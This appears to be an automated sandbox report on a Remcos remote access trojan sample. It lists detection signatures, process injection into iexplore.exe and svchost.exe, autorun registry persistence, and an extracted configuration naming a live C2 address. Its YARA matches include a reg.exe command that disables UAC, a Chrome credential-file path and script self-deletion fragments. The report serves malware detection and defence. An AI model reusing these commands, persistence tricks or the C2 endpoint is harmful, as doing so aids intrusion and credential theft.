Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1.exe

Overview

General Information

Sample name:1.exe
Analysis ID:1583735
MD5:38c479083ba7387ebad73f3b67020eab
SHA1:48bbd0bf1d333293c22c96b7731ba54343d7f8fe
SHA256:af9a6206a5f41bcdf8567adee799d8c5141da48776508c3c73617b2c140d84cb
Tags:exemalwareremcosuser-Joker
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Creates autostart registry keys with suspicious names
Delayed program exit found
Found evasive API chain (may stop execution after checking mutex)
Found stalling execution ending in API Sleep call
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sigma detected: Suspect Svchost Activity
Writes to foreign memory regions
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Potential browser exploit detected (process start blacklist hit)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • 1.exe (PID: 4956 cmdline: "C:\Users\user\Desktop\1.exe" MD5: 38C479083BA7387EBAD73F3B67020EAB)
    • Realtek Driver.exe (PID: 6508 cmdline: "C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exe" MD5: 38C479083BA7387EBAD73F3B67020EAB)
      • iexplore.exe (PID: 3716 cmdline: "c:\program files (x86)\internet explorer\iexplore.exe" MD5: 6F0F06D6AB125A99E43335427066A4A1)
        • svchost.exe (PID: 3448 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
  • Realtek Driver.exe (PID: 1352 cmdline: "C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exe" MD5: 38C479083BA7387EBAD73F3B67020EAB)
  • Realtek Driver.exe (PID: 4996 cmdline: "C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exe" MD5: 38C479083BA7387EBAD73F3B67020EAB)
  • Realtek Driver.exe (PID: 6552 cmdline: "C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exe" MD5: 38C479083BA7387EBAD73F3B67020EAB)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["46.175.167.116:2404:1"], "Assigned name": "Hello World!", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "AppData", "Copy file": "Realtek Driver.exe", "Startup value": "Disable", "Hide file": "Enable", "Mutex": "Realtek Audio-J15M0S", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Realtek Audio", "Keylog folder": "remcos"}
SourceRuleDescriptionAuthorStrings
1.exeJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
    1.exeJoeSecurity_RemcosYara detected Remcos RATJoe Security
      1.exeJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
        1.exeWindows_Trojan_Remcos_b296e965unknownunknown
        • 0x6aab8:$a1: Remcos restarted by watchdog!
        • 0x6b030:$a3: %02i:%02i:%02i:%03i
        1.exeREMCOS_RAT_variantsunknownunknown
        • 0x64b0c:$str_a1: C:\Windows\System32\cmd.exe
        • 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
        • 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
        • 0x64b7c:$str_b2: Executing file:
        • 0x65bfc:$str_b3: GetDirectListeningPort
        • 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
        • 0x65728:$str_b7: \update.vbs
        • 0x64ba4:$str_b9: Downloaded file:
        • 0x64b90:$str_b10: Downloading file:
        • 0x64c34:$str_b12: Failed to upload file:
        • 0x65bc4:$str_b13: StartForward
        • 0x65be4:$str_b14: StopForward
        • 0x65680:$str_b15: fso.DeleteFile "
        • 0x65614:$str_b16: On Error Resume Next
        • 0x656b0:$str_b17: fso.DeleteFolder "
        • 0x64c24:$str_b18: Uploaded file:
        • 0x64be4:$str_b19: Unable to delete:
        • 0x65648:$str_b20: while fso.FileExists("
        • 0x650c1:$str_c0: [Firefox StoredLogins not found]
        Click to see the 1 entries
        SourceRuleDescriptionAuthorStrings
        C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
          C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeJoeSecurity_RemcosYara detected Remcos RATJoe Security
            C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
              C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeWindows_Trojan_Remcos_b296e965unknownunknown
              • 0x6aab8:$a1: Remcos restarted by watchdog!
              • 0x6b030:$a3: %02i:%02i:%02i:%03i
              C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeREMCOS_RAT_variantsunknownunknown
              • 0x64b0c:$str_a1: C:\Windows\System32\cmd.exe
              • 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
              • 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
              • 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
              • 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
              • 0x64b7c:$str_b2: Executing file:
              • 0x65bfc:$str_b3: GetDirectListeningPort
              • 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
              • 0x65728:$str_b7: \update.vbs
              • 0x64ba4:$str_b9: Downloaded file:
              • 0x64b90:$str_b10: Downloading file:
              • 0x64c34:$str_b12: Failed to upload file:
              • 0x65bc4:$str_b13: StartForward
              • 0x65be4:$str_b14: StopForward
              • 0x65680:$str_b15: fso.DeleteFile "
              • 0x65614:$str_b16: On Error Resume Next
              • 0x656b0:$str_b17: fso.DeleteFolder "
              • 0x64c24:$str_b18: Uploaded file:
              • 0x64be4:$str_b19: Unable to delete:
              • 0x65648:$str_b20: while fso.FileExists("
              • 0x650c1:$str_c0: [Firefox StoredLogins not found]
              Click to see the 1 entries
              SourceRuleDescriptionAuthorStrings
              00000008.00000000.2277687152.0000000000459000.00000002.00000001.01000000.00000006.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                00000008.00000000.2277687152.0000000000459000.00000002.00000001.01000000.00000006.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
                  00000008.00000000.2277687152.0000000000459000.00000002.00000001.01000000.00000006.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                    00000008.00000000.2277687152.0000000000459000.00000002.00000001.01000000.00000006.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
                    • 0x134b8:$a1: Remcos restarted by watchdog!
                    • 0x13a30:$a3: %02i:%02i:%02i:%03i
                    00000002.00000002.2024293538.0000000000459000.00000002.00000001.01000000.00000006.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                      Click to see the 108 entries
                      SourceRuleDescriptionAuthorStrings
                      3.2.iexplore.exe.4ba0000.2.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                        3.2.iexplore.exe.4ba0000.2.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                          3.2.iexplore.exe.4ba0000.2.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                            3.2.iexplore.exe.4ba0000.2.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                            • 0x6c4b8:$a1: Remcos restarted by watchdog!
                            • 0x6ca30:$a3: %02i:%02i:%02i:%03i
                            3.2.iexplore.exe.4ba0000.2.raw.unpackREMCOS_RAT_variantsunknownunknown
                            • 0x6650c:$str_a1: C:\Windows\System32\cmd.exe
                            • 0x66488:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                            • 0x66488:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                            • 0x66988:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                            • 0x671b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                            • 0x6657c:$str_b2: Executing file:
                            • 0x675fc:$str_b3: GetDirectListeningPort
                            • 0x66fa8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                            • 0x67128:$str_b7: \update.vbs
                            • 0x665a4:$str_b9: Downloaded file:
                            • 0x66590:$str_b10: Downloading file:
                            • 0x66634:$str_b12: Failed to upload file:
                            • 0x675c4:$str_b13: StartForward
                            • 0x675e4:$str_b14: StopForward
                            • 0x67080:$str_b15: fso.DeleteFile "
                            • 0x67014:$str_b16: On Error Resume Next
                            • 0x670b0:$str_b17: fso.DeleteFolder "
                            • 0x66624:$str_b18: Uploaded file:
                            • 0x665e4:$str_b19: Unable to delete:
                            • 0x67048:$str_b20: while fso.FileExists("
                            • 0x66ac1:$str_c0: [Firefox StoredLogins not found]
                            Click to see the 127 entries

                            System Summary

                            barindex
                            Source: Process startedAuthor: David Burkett, @signalblur: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "c:\program files (x86)\internet explorer\iexplore.exe", ParentImage: C:\Program Files (x86)\Internet Explorer\iexplore.exe, ParentProcessId: 3716, ParentProcessName: iexplore.exe, ProcessCommandLine: svchost.exe, ProcessId: 3448, ProcessName: svchost.exe
                            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\1.exe, ProcessId: 4956, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek Audio-J15M0S
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "c:\program files (x86)\internet explorer\iexplore.exe", ParentImage: C:\Program Files (x86)\Internet Explorer\iexplore.exe, ParentProcessId: 3716, ParentProcessName: iexplore.exe, ProcessCommandLine: svchost.exe, ProcessId: 3448, ProcessName: svchost.exe
                            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\1.exe, ProcessId: 4956, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Realtek Audio-J15M0S
                            Source: Process startedAuthor: vburov: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "c:\program files (x86)\internet explorer\iexplore.exe", ParentImage: C:\Program Files (x86)\Internet Explorer\iexplore.exe, ParentProcessId: 3716, ParentProcessName: iexplore.exe, ProcessCommandLine: svchost.exe, ProcessId: 3448, ProcessName: svchost.exe
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-01-03T13:33:59.542694+010020365941Malware Command and Control Activity Detected192.168.2.54970446.175.167.1162404TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-01-03T13:34:01.143456+010028033043Unknown Traffic192.168.2.549705178.237.33.5080TCP

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Source: 1.exeAvira: detected
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeAvira: detection malicious, Label: BDS/Backdoor.Gen
                            Source: 1.exeMalware Configuration Extractor: Remcos {"Host:Port:Password": ["46.175.167.116:2404:1"], "Assigned name": "Hello World!", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "AppData", "Copy file": "Realtek Driver.exe", "Startup value": "Disable", "Hide file": "Enable", "Mutex": "Realtek Audio-J15M0S", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Realtek Audio", "Keylog folder": "remcos"}
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeReversingLabs: Detection: 86%
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeVirustotal: Detection: 79%Perma Link
                            Source: 1.exeVirustotal: Detection: 79%Perma Link
                            Source: 1.exeReversingLabs: Detection: 86%
                            Source: Yara matchFile source: 1.exe, type: SAMPLE
                            Source: Yara matchFile source: 3.2.iexplore.exe.4ba0000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.Realtek Driver.exe.5e0620.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 8.0.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 4.2.svchost.exe.3030000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.iexplore.exe.4ba0000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.iexplore.exe.2d70000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.iexplore.exe.30e0ba0.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.0.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.0.1.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.1.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.Realtek Driver.exe.5e0620.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.iexplore.exe.30e0ba0.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 4.2.svchost.exe.3030000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.Realtek Driver.exe.2570000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.2.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.Realtek Driver.exe.2570000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.0.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.iexplore.exe.2d70000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 8.2.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.0.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000008.00000000.2277687152.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000002.2024293538.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000000.2195185970.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000002.2196581789.0000000000697000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000002.2114588212.000000000055A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000000.2016191129.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000002.2114459695.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000008.00000002.2278067341.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000008.00000002.2278167412.00000000006BB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000000.2021874573.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000002.3265970543.0000000004BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000002.2196423426.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000000.2113169256.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000002.3265805853.0000000003431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000003.2016636458.0000000000521000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000002.3265768781.0000000003400000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.2022398909.00000000004FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000002.3265606404.0000000003030000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000002.2024405798.00000000005BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000002.2024631723.0000000002570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000002.3265831941.00000000030BB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: 1.exe PID: 4956, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Realtek Driver.exe PID: 6508, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: iexplore.exe PID: 3716, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3448, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Realtek Driver.exe PID: 1352, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Realtek Driver.exe PID: 4996, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Realtek Driver.exe PID: 6552, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exe, type: DROPPED
                            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.2% probability
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeJoe Sandbox ML: detected
                            Source: 1.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,0_2_004338C8
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 3_2_02DA38C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,3_2_02DA38C8
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030638C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,4_2_030638C8
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: 5_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,5_2_004338C8
                            Source: 1.exe, 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_63492772-1

                            Exploits

                            barindex
                            Source: Yara matchFile source: 1.exe, type: SAMPLE
                            Source: Yara matchFile source: 3.2.iexplore.exe.4ba0000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.Realtek Driver.exe.5e0620.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 8.0.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 4.2.svchost.exe.3030000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.iexplore.exe.4ba0000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.iexplore.exe.2d70000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.iexplore.exe.30e0ba0.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.0.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.0.1.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.1.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.Realtek Driver.exe.5e0620.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.iexplore.exe.30e0ba0.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 4.2.svchost.exe.3030000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.Realtek Driver.exe.2570000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.2.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.Realtek Driver.exe.2570000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.0.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.iexplore.exe.2d70000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 8.2.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.0.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000008.00000000.2277687152.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000002.2024293538.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000000.2195185970.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000000.2016191129.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000002.2114459695.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000008.00000002.2278067341.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000000.2021874573.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000002.3265970543.0000000004BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000002.2196423426.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000000.2113169256.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000002.3265805853.0000000003431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000003.2016636458.0000000000521000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000002.3265606404.0000000003030000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000002.2024405798.00000000005BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000002.2024631723.0000000002570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000002.3265831941.00000000030BB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: 1.exe PID: 4956, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Realtek Driver.exe PID: 6508, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: iexplore.exe PID: 3716, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3448, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Realtek Driver.exe PID: 1352, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Realtek Driver.exe PID: 4996, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Realtek Driver.exe PID: 6552, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exe, type: DROPPED

                            Privilege Escalation

                            barindex
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00407538 _wcslen,CoGetObject,0_2_00407538
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 3_2_02D77538 _wcslen,CoGetObject,3_2_02D77538
